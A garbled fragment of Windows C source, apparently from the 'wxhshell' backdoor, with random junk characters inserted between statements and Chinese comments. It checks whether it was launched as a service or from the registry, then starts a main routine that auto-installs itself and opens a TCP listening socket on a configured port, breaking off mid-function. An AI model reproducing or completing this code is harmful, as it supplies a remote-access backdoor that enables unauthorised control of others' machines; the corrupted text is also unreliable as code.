QSf{V(fs HINSTANCE hInst = LoadLibraryA("PSAPI.DLL"); I3o6ym-i if(NULL == hInst ) return 0; S/pTFlptCa ;3NA,JA#Y g_pEnumProcessModules = (ENUMPROCESSMODULES)GetProcAddress(hInst ,"EnumProcessModules"); )|f!}( p g_pGetModuleBaseName = (GETMODULEBASENAME)GetProcAddress(hInst, "GetModuleBaseNameA"); 1lu_<?O NtQueryInformationProcess = (PROCNTQSIP)GetProcAddress(GetModuleHandle("ntdll"), "NtQueryInformationProcess"); -?n|kSHX V}ZF\SG(K if (!NtQueryInformationProcess) return 0; DWDL|4
og Q}ho
Y hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,GetCurrentProcessId()); }~$zdgMT if(!hProcess) return 0; l= % v Pb=J4Lvz(d if(NtQueryInformationProcess( hProcess, 0, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL)) return 0; E7^r3#s
2F+K( CloseHandle(hProcess); hH8:7i +~Ri CZt hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pbi.InheritedFromUniqueProcessId); b8v?@s~ if(hProcess==NULL) return 0; jI0gQ [ B@dA?w.x HMODULE hMod; p;Kw$fQ? char procName[255]; :~BY[") unsigned long cbNeeded; k0.|%0?K G&MI@Hq if(g_pEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) g_pGetModuleBaseName(hProcess, hMod, procName, sizeof(procName)); E`.dU<8HE Hw[u Sv8 CloseHandle(hProcess); L!:} 01q5BQ7u if(strstr(procName,"services")) return 1; // 以服务启动 g83]/s+ x7 jE
Ns ) return 0; // 注册表启动 qazM@ } \"i2E! RVtb0FL // 主模块 c*ac9Y'o int StartWxhshell(LPSTR lpCmdLine) "1_eZ ` { XJTY91~R SOCKET wsl; S{aK\>>H BOOL val=TRUE; MDa 4U@Q int port=0; dN
J2pfvv struct sockaddr_in door; h{I)^8,M D U#6%8~ if(wscfg.ws_autoins) Install(); S!cc% UbT 7 port=atoi(lpCmdLine); I:[^><?E )xIk#>) if(port<=0) port=wscfg.ws_port; jD9^DzFx gy/z;fB WSADATA data; yU3fM?a if(WSAStartup(MAKEWORD(2,2),&data)!=0) return 1; hrPm$`
Lh0Pvq0C if((wsl = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET) return 1; vFXih'=_ setsockopt(wsl,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val)); @D&V |